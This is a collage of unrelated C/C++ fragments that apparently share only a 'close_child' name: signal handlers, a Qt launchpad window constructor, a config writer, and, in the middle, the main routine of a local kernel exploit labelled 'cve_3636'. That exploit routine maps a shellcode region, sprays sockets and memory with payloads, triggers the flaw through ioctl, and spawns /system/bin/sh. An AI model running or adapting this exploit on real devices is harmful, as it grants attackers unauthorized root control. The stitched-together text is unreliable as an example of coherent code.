static void abrt_handler(int sig) { syslog(LOG_ERR, "sigabrt received"); if (client != NULL) close_child(false); syslog_close(); _exit(1); }
static void term_handler(int sig) { syslog(LOG_NOTICE, "sigterm received"); if (client != NULL) { client_quit(); close_child(true); syslog_close(); _exit(1); } else { terminate = true; } }
Qt_launchpad::Qt_launchpad(unsigned long initial_quota, QWidget *parent) : QMainWindow(parent), Launchpad(initial_quota) { setupUi(this); // disable minimize and maximize buttons Qt::WindowFlags flags = windowFlags(); flags &= ((~Qt::WindowMinMaxButtonsHint)|(Qt::WindowStaysOnTopHint)); setWindowFlags(flags); // To trigger lastWindowClosed() setAttribute(Qt::WA_QuitOnClose, true); launcherDockWidgetContents = new QToolBox(); // put a QScrollArea into launcherDockWidget for scrolling of launcher entries /*QScrollArea *launcherScrollArea = new QScrollArea; launcherScrollArea->setFrameStyle(QFrame::NoFrame); launcherScrollArea->setWidget(launcherDockWidgetContents);*/ launcherDockWidget->setWidget(launcherDockWidgetContents); launcherDockWidget->setFont(QFont("OS5",12,QFont::Bold)); // put a QScrollArea into childrenDockWidget for scrolling of child entries QScrollArea *childrenScrollArea = new QScrollArea; childrenScrollArea->setFrameStyle(QFrame::NoFrame); childrenScrollArea->setWidget(childrenDockWidgetContents); childrenDockWidget->setWidget(childrenScrollArea); childrenDockWidget->setFont(QFont("OS5",12,QFont::Bold)); QVBoxLayout *childrenDockWidgetLayout = new QVBoxLayout; childrenDockWidgetLayout->setContentsMargins(0, 0, 0, 0); childrenDockWidgetLayout->setSpacing(0); childrenDockWidgetLayout->setAlignment(Qt::AlignTop); childrenDockWidgetContents->setLayout(childrenDockWidgetLayout); childrenDockWidget->hide(); statusDockWidget->hide(); QObject::connect(childrenDockWidget,SIGNAL(topLevelChanged(bool)),this,SLOT(enlarge_childrenDockWg(bool))); QObject::connect(statusDockWidget,SIGNAL(topLevelChanged(bool)),this,SLOT(enlarge_statusDockWg(bool))); // update the available quota bar every 200ms QTimer *avail_quota_timer = new QTimer(this); connect(avail_quota_timer, SIGNAL(timeout()), this, SLOT(avail_quota_update())); avail_quota_timer->start(200); Middle* middle=new Middle(); QObject::connect(middle,SIGNAL(quit_child()),this,SLOT(close_child())); QObject::connect(this,SIGNAL(unlock_child()),middle,SLOT(unlock())); middle->start(); }
int main() { int *socks; unsigned long *address[MAX_MMAP]; int pid[MAX_CHILD]; int pipe_read[MAX_CHILD]; void *addr; int max_fds; int i, num_socks, num_child; int j; int success, count; int fd; int vulnerable = 0; int child_socks, total_child_socks; int temp; unsigned long *target; addr = mmap((void*)0x200000, _PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (addr == MAP_FAILED) { printf("map failed!\n"); return -1; } memset((void*)0x200000, 0, _PAGE_SIZE); protect_from_oom_killer(); fd = create_icmp_socket(); if (fd < 0) { printf("can not crate icmp socket!\n"); return -1; } setup_vul_socket(fd); for (i = 0; i < _PAGE_SIZE / sizeof(int *); i++) { if (((unsigned int*)addr)[i] != 0) { vulnerable = 1; break; } } if (vulnerable == 0) { printf("cve_3636 not vulnerable!\n"); return -1; } if (mmap(0x50000000, 0x4000, PROT_WRITE | PROT_READ | PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0) != 0x50000000) { printf("map shellcode area failed!\n"); return -1; } for (i = 0; i < 0x4000; i += 4){ target = 0x50000000 + i; *target = call_back; } my_pid = getpid(); max_fds = maximize_fd_limit(); printf("max_fds = %d\n", max_fds); socks = malloc(sizeof(int*) * (max_fds + 1)); printf("create child to spray\n"); num_child = 0; num_socks = 0; child_socks = 0; total_child_socks = 0; for (i = 0; i < MAX_CHILD; i++) { if (total_child_socks > MAX_SOCKS) break; pid[i] = create_child(&pipe_read[i], max_fds, &child_socks); if (pid[i] == -1) break; printf("."); fflush(stdout); //printf("create vulnerable socket!\n"); total_child_socks += child_socks; //printf("\n now child sockets = %d\n", total_child_socks); if ( num_socks < max_fds) { socks[num_socks] = create_icmp_socket(); if (socks[num_socks] == -1) break; num_socks++; } usleep(500000); } num_child = i; printf("total child sockets: %d\n", total_child_socks); printf("\nchild num: %d\n", num_child); socks[num_socks] = -1; printf("vulnerable socket num: %d\n", num_socks); printf("now close child socket!\n"); for (i = 0; i < num_child; i++) { close_child(pid[i]); } printf("setup vulnerable socket!\n"); for (i = 0; i < num_socks; i++) { setup_vul_socket(socks[i]); } printf("sparying ...\n"); success = 0; while (1) { count = 0; for (i = 0; i < MAX_MMAP; i++) { address[i] = mmap((void*)0, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0); if (address[i] == MAP_FAILED) { printf("map failed!\n"); break; } fill_payload(address[i], MAP_SIZE); for (j = 0; socks[j] != -1; j++) { if (get_sk(socks[j]) > 0) { success = 1; printf("get it!\n"); ioctl(socks[j], 0x5678, &temp); break; } } if (success) break; } count = i; if (success) { printf("free %ld bytes\n", MAP_SIZE * (count - 1)); for (i = 0; i < count; i++) { munmap(address[i], MAP_SIZE); } munmap(0x50000000, 0x4000); system("/system/bin/sh"); break; } } printf("main end!\n"); return 0; }
void config_writer::write_child(const std::string &key, const config &cfg) { open_child(key); ::write(out_, cfg, level_); close_child(key); }